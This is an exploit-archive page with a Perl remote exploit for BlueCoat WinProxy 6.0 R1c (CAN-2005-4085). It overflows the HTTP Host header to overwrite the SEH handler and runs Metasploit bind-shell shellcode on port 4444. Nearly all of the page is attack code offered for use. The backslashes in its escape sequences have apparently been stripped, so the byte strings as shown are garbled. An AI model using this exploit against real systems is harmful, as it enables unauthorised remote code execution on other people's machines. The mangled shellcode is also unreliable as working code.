BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit
# Published : 2006-01-07
# Author : FistFuXXer
# Previous Title : Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
# Next Title : Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)

#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author:  FistFucker (aka FistFuXXer)
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;

#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "x01x03x12x40" );  # POP/POP/RET
                                       # PAVDLL.01031240

#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "x90x90xebx32";             # [NOP][NOP][JMP|JMP]

#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x26".
      "x8cx6dxa3x83xebxfcxe2xf4xdaxe6x86xeexcex75x92x5c".
      "xd9xecxe6xcfx02xa8xe6xe6x1ax07x11xa6x5ex8dx82x28".
      "x69x94xe6xfcx06x8dx86xeaxadxb8xe6xa2xc8xbdxadx3a".
      "x8ax08xadxd7x21x4dxa7xaex27x4ex86x57x1dxd8x49x8b".
      "x53x69xe6xfcx02x8dx86xc5xadx80x26x28x79x90x6cx48".
      "x25xa0xe6x2ax4axa8x71xc2xe5xbdxb6xc7xadxcfx5dx28".
      "x66x80xe6xd3x3ax21xe6xe3x2exd2x05x2dx68x82x81xf3".
      "xd9x5ax0bxf0x40xe4x5ex91x4exfbx1ex91x79xd8x92x73".
      "x4ex47x80x5fx1dxdcx92x75x79x05x88xc5xa7x61x65xa1".
      "x73xe6x6fx5cxf6xe4xb4xaaxd3x21x3ax5cxf0xdfx3exf0".
      "x75xdfx2exf0x65xdfx92x73x40xe4x7cxffx40xdfxe4x42".
      "xb3xe4xc9xb9x56x4bx3ax5cxf0xe6x7dxf2x73x73xbdxcb".
      "x82x21x43x4ax71x73xbbxf0x73x73xbdxcbxc3xc5xebxea".
      "x71x73xbbxf3x72xd8x38x5cxf6x1fx05x44x5fx4ax14xf4".
      "xd9x5ax38x5cxf6xeax07xc7x40xe4x0excexafx69x07xf3".
      "x7fxa5xa1x2axc1xe6x29x2axc4xbdxadx50x8cx72x2fx8e".
      "xd8xcex41x30xabxf6x55x08x8dx27x05xd1xd8x3fx7bx5c".
      "x53xc8x92x75x7dxdbx3fxf2x77xddx07xa2x77xddx38xf2".
      "xd9x5cx05x0exffx89xa3xf0xd9x5ax07x5cxd9xbbx92x73".
      "xadxdbx91x20xe2xe8x92x75x74x73xbdxcbx58x54x8fxd0".
      "x75x73xbbx5cxf6x8cx6dxa3";


print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."nn";

$sock = IO::Socket::INET->new
(

    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.n";
print "[+] Trying to overwrite SE handler...n";

$sock->send( "GET / HTTP/1.0rn" );
$sock->send( 'Host: 127.0.0.1:'. "x90" x 23 . $jmp . $seh . "x90" x 50 . $sc ."rnrn" );

print "[+] Done. Now check for bind shell on $ip:4444!";

close($sock);

# www.Syue.com [2006-01-07]